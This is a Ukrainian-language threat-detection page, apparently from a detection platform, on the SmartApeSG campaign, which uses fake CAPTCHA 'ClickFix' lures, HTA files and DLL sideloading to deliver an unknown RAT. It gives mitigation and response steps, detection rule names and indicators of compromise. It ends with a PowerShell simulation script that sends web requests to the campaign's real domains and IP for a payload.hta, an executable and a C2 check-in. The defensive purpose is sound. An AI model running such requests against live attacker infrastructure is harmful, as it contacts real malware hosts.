SmartApeSG розповсюджує невідомий RAT через пастки ClickFix
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Кампанія SmartApeSG використовує техніку ClickFix, щоб обманом змусити користувачів запускати шкідливі команди через фальшиві CAPTCHA або сторінки верифікації людини. Ця дія запускає HTA файл, який завантажує та витягує шкідливий ZIP архів. Кінцевим корисним навантаженням є невідомий троян для віддаленого доступу (RAT), що покладається на побічне завантаження DLL для встановлення стійкості та зв’язку з його C2 інфраструктурою.
Розслідування
Розслідування включало аналіз HTTPS трафіку, файлів PCAP та шкідливих архівів, пов’язаних з активністю SmartApeSG. Дослідники виявили шкідливий JavaScript, впроваджений у легітимні вебсайти, та відстежили ланцюжок інфекції від команди, впровадженої в буфер обміну, до остаточного з’єднання C2. Було відмічено, що RAT зв’язується із зовнішньою IP-адресою через порт 443, використовуючи зашифрований трафік.
Пом’якшення
Організації повинні використовувати веб-фільтрацію для блокування відомих шкідливих доменів, включаючи pewtercanto[.]top and deltaode[.]com. Користувачам слід навчитися розпізнавати методи соціальної інженерії, такі як фальшиві CAPTCHA та інструкції ClickFix. Обмеження виконання HTA файлів та моніторинг підозрілих дочірніх процесів, запущених браузерами або командами Run, можуть подальше зменшити ризик.
Відповідь
Якщо активність SmartApeSG виявлено, уражене кінцеве обладнання слід негайно ізолювати, щоб припинити зв’язок C2. Розслідники повинні перевірити директорії AppData і Documents для ідентифікації RAT та його механізмів стійкості. Також слід переглянути телеметрію кінцевої точки віддаленого виконання HTA, маніпуляцій з буфером обміну та активності побічного завантаження DLL.
Хід атаки
Детекції
Підозріле командування і контроль за незвичайним запитом DNS з верхнього рівня (TLD) (через dns)
Proof of Value
Підозрілі змінні оточення (через cmdline)
Proof of Value
Підозріле виконання Mshta без HTA файлу (через cmdline)
Proof of Value
Незвичайний домен верхнього рівня в командному рядку (через cmdline)
Proof of Value
IOC (HashSha256) для виявлення: Кампанія SmartApeSG ClickFix розповсюджує нерозпізнаний RAT
Proof of Value
IOC (SourceIP) для виявлення: Кампанія SmartApeSG ClickFix розповсюджує нерозпізнаний RAT
Proof of Value
IOC (DestinationIP) для виявлення: Кампанія SmartApeSG ClickFix розповсюджує нерозпізнаний RAT
Proof of Value
Активність RAT кампанії SmartApeSG ClickFix [З’єднання Windows в мережі]
Proof of Value
Виявлення нерозпізнаного RAT через побічне завантаження DLL в кампанії SmartApeSG [Файловий захід Windows]
Proof of Value
Виконання симуляції
Вимога: Телеметрія та базова перевірка перед польотом повинні були пройдені.
Пояснення: Цей розділ деталізує точне виконання техніки противника (TTP), розробленої для активації правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та прагнути генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або не пов’язані приклади призведуть до хибного діагнозу.
-
Опис атаки та команди: Атака виконується шляхом запуску кампанії SmartApeSG ClickFix. Після того, як користувач обманутий на виконання шкідливих дій (часто це фальшиве оновлення браузера), система намагається завантажити шкідливий HTA файл. HTA тоді ініціює підключення до інфраструктури C2 для завантаження останнього корисного навантаження RAT. Щоб змоделювати це, ми будемо генерувати мережеві запити, що відповідатимуть точним рядкам, визначеним у логіці виявлення:
deltaode.compo,deltaode.com/wv, і IP89.124.79.98. -
Скрипт регресійного тестування:
# Скрипт симуляції для активації правила виявлення SmartApeSG # Цей скрипт імітує мережеві запити до визначених IoC $urls = @( "https://deltaode.compo/payload.hta", "https://deltaode.com/wv/malicious.exe", "http://89.124.79.98:443/c2_checkin" ) foreach ($url in $urls) { Write-Host "Імітація запиту до: $url" try { # Використання Invoke-WebRequest для генерування мережевої телеметрії # Ми використовуємо -ErrorAction SilentlyContinue, оскільки ці домени фактично не існують Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction SilentlyContinue } catch { Write-Host "Запит не вдався (очікувано), але телеметрія повинна бути створена." } } -
Команди очищення:
# Зміни, які були зроблені в системі, не є постійними; очищення не потрібно. Write-Host "Симуляція завершена. Ніяких артефактів на системі не залишилося."